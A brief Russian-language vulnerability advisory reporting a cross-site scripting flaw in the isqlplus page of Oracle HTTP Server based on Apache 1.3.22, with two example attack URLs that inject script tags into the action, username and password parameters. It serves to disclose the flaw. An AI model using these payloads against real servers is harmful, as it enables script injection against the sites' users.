Программа: Oracle HTTP Based on Apache 1.3.22
Уязвимость в проверке правильности входных данных обнаружена в Oracle HTTP Server. Удаленный пользователь может выполнить XSS нападение.
Пример:
http://[target]/isqlplus? action=logon&username=sdfds%22%
3e%3cscript%3ealert ('XSS')%3c/script%3e\&password=dsfsd%3cscript%3 ealert('XSS')%3c/script%3e
http://[target]/isqlplus?action=<script>alert('XSS')</script>